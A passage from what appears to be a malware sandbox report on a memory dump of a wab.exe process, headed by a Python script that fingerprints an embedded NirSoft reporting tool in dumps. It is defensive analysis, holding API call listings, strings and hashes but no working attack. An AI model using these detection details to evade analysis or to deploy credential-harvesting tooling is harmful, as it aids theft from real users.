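    "nt_systemroot_prefix": "\\systemroot",
}


def _encodings(text: str) -> Dict[str, bytes]:
    """Both byte forms a Win32 binary could hold the string in."""
    return {"ansi": text.encode("ascii"), "utf16le": text.encode("utf-16-le")}


def scan_dump(dump: bytes, image_base: int = 0x400000) -> List[Tuple[int, str, str]]:
    """Return (virtual address, fingerprint name, encoding) for every hit.
    image_base is assumed to be where the dump was mapped (the report's
    sdmp offset is 00400000); adjust it for other dumps."""
    hits: List[Tuple[int, str, str]] = []
    for name, text in FINGERPRINTS.items():
        for enc, needle in _encodings(text).items():
            for m in re.finditer(re.escape(needle), dump):
                hits.append((image_base + m.start(), name, enc))
    return sorted(hits)


def looks_like_nirsoft_report_tool(dump: bytes, min_distinct: int = 3) -> bool:
    """Require the nirsoft.net link plus at least min_distinct distinct
    fingerprints overall; single generic strings do not count as a match."""
    distinct = {name for _, name, _ in scan_dump(dump)}
    return "html_nirsoft_link" in distinct and len(distinct) >= min_distinct


# Constructed dump: zero padding, two ANSI template fragments, one UTF-16LE
# shell-folder name. Not taken from the real sample.
CONSTRUCTED_DUMP = (
    b"\x00" * 0x40
    + FINGERPRINTS["html_doctype"].encode("ascii") + b"\x00" * 8
    + b'<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>\x00'
    + "Common Startup".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    for va, name, enc in scan_dump(CONSTRUCTED_DUMP):
        print(f"{va:08x} {enc:8s} {name}")
    print("NirSoft report tool present:", looks_like_nirsoft_report_tool(CONSTRUCTED_DUMP))
```

Run it against a real dump with `scan_dump(open(path, "rb").read(), image_base)`; the returned virtual addresses can then be compared with the `xrefs` values in the Strings entries to confirm the same build is loaded.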

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
• Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
• Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
• Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
• Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
• Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memchrmemset
• String ID: PD$PD
• API String ID: 1581201632-2312785699
• Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
• Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
• Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
• Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(00000011), ref: 00409F5B
• GetSystemMetrics.USER32(00000010), ref: 00409F61
• GetDC.USER32(00000000), ref: 00409F6E
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
• ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
• GetWindowRect.USER32(?,?), ref: 00409FA0
• GetParent.USER32(?), ref: 00409FA5
• GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
• Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$wcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 239872665-3916222277
                                                                                                                                                                                                          • Opcode ID: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
• Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
• Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
• Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
• memcpy.MSVCRT ref: 0040EB80
• memcpy.MSVCRT ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
• Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
Uniqueness

Uniqueness Score: -1.00%

APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
• Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
• Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00407E44
• memset.MSVCRT ref: 00407E5B
• _mbscpy.MSVCRT ref: 00407E7E
• _mbscpy.MSVCRT ref: 00407ED7
• _mbscpy.MSVCRT ref: 00407EEE
• _mbscpy.MSVCRT ref: 00407F01
• wcscpy.MSVCRT ref: 00407F10
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
• String ID:
• API String ID: 59245283-0
• Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
• Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
• Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
• Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
Uniqueness

Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• ??3@YAXPAX@Z.MSVCRT ref: 004185AC
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastSleep$??3@
• String ID:
• API String ID: 3467550082-0
• Opcode ID: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
• Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
• Opcode Fuzzy Hash: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
• Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
• Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID: 3A
• API String ID: 3300951397-293699754
                                                                                                                                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
